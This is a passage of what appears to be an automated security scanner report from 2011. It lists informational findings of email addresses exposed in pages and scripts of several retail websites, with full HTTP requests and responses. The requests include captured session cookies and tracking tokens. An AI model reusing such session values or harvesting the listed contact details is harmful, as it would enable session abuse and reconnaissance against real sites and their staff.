Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541033888&t2=1305541035139&t3=1305541039955&t4=1305541030076&lti=1305541038716&ln=&hr=/find/cart.jsp&fti=1305541039955&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:17:22 GMT
Connection: close
Content-Length: 6834

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg     url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg     name(stri
...[SNIP]...

20.24. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.placeHolder.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /FrameWork/js/jquery/jquery.placeHolder.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FrameWork/js/jquery/jquery.placeHolder.js HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541033888&t2=1305541035139&t3=1305541039955&t4=1305541030076&lti=1305541038716&ln=&hr=/find/cart.jsp&fti=1305541039955&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 04:00:18 GMT
ETag: "852-4d6b1dd2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:17:25 GMT
Connection: close
Content-Length: 2130

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...

20.25. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /FrameWork/js/jquery/jquery.styledDropdown.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FrameWork/js/jquery/jquery.styledDropdown.min.js?v=05152011 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541033888&t2=1305541035139&t3=1305541039955&t4=1305541030076&lti=1305541038716&ln=&hr=/find/cart.jsp&fti=1305541039955&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Apr 2010 03:00:13 GMT
ETag: "f26-4bcbc73d"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:17:24 GMT
Connection: close
Content-Length: 3878

/**
* Styled Dropdown - jQuery Plugin v0.1.0
* Easily converts SELECT elements to eventful and styleable DL, DT, DD elements.
* Requires jQuery 1.3.x
*
* Copyright 2010, Andres Vidal (code@andresvidal.com)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://www.andresvidal.com/license/styledDropdown
*
* Instructions: Call $(selector).styledDropdown(options) on an element with a jQuery
...[SNIP]...

20.26. http://www.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:04 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
Set-Cookie: bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnses=ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 105239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.or
...[SNIP]...
<a href="mailto:service@bluenile.com">service@bluenile.com</a>
...[SNIP]...
<a href="mailto:service@bluenile.com" class="blue">service@bluenile.com&nbsp;<img src="/assets/chrome/icons/arrow_white_small_bluebg.gif" width="5" height="8" border="0" />
...[SNIP]...

20.27. http://www.bluenile.com/build-your-own-diamond-ring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The following email address was disclosed in the response:

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:36:20 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<a href="mailto:service@bluenile.com">service@bluenile.com</a>
...[SNIP]...
<a href="mailto:service@bluenile.com" class="blue">service@bluenile.com&nbsp;<img src="/assets/chrome/icons/arrow_white_small_bluebg.gif" width="5" height="8" border="0" />
...[SNIP]...

20.28. http://www.bluenile.com/engagement-rings

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /engagement-rings

Issue detail

The following email address was disclosed in the response:

Request

GET /engagement-rings?track=head HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.1.10.1305541144

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:26 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Vary: Accept-Encoding
Content-Length: 76503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="htt
...[SNIP]...
<a href="mailto:service@bluenile.com">service@bluenile.com</a>
...[SNIP]...
<a href="mailto:service@bluenile.com" class="blue">service@bluenile.com&nbsp;<img src="/assets/chrome/icons/arrow_white_small_bluebg.gif" width="5" height="8" border="0" />
...[SNIP]...

20.29. http://www.brookstone.com/protoculous_102.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /protoculous_102.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /protoculous_102.js HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 01:29:05 GMT
ETag: W/"258912-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:04 GMT
Age: 1563
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...
8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))

...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

20.30. https://www.brookstone.com/protoculous_102.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /protoculous_102.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /protoculous_102.js HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: https://www.brookstone.com/formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 10:04:41 GMT
ETag: W/"258912-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:04:40 GMT
Age: 1239
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...
8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))

...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

20.31. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...

20.32. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The following email address was disclosed in the response:

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...

20.33. https://www.gnc.com/common/checkout/js/jsu-1.0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /common/checkout/js/jsu-1.0.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/checkout/js/jsu-1.0.js HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: https://www.gnc.com/checkout/index.jsp?process=orderTrackingLogin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:59 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 15 Oct 2010 07:09:00 GMT
ETag: "147003d-62c0-492a280329b00"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 08:03:59 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 25280

/**
* @name script
*/
if(typeof(u) == 'undefined'){
/**
* the base class for the jsu library. does nothing right now
* @author Brad Hurley me@bradhurley.com
* @class
* @static
* @version 1.0.8
* @event serviceRequest {activeServiceRequests url parameters}
* @event serviceRequestComplete {activeServiceRequests url parameters}

...[SNIP]...

20.34. https://www.guitarcenter.com/includes/guitarcenter/GuitarCenter.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /includes/guitarcenter/GuitarCenter.css

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/guitarcenter/GuitarCenter.css HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: https://www.guitarcenter.com/MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 26 Apr 2011 21:33:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
SN: 27
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:51 GMT
Content-Length: 45904

.../**Last edited on 7-30-2009 by Erick B. Hernandez (email: ebhernandez@guitarcenter.com)**/
/******** BEGIN CSS RESET - DO NOT MODIFY**********/
/* this resets the styles so they are the same across all browers/platforms */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldse
...[SNIP]...

20.35. https://www.guitarcenter.com/includes/guitarcenter/scripts/jquery.colorbox-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /includes/guitarcenter/scripts/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/guitarcenter/scripts/jquery.colorbox-min.js HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: https://www.guitarcenter.com/MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 26 Apr 2011 21:32:26 GMT
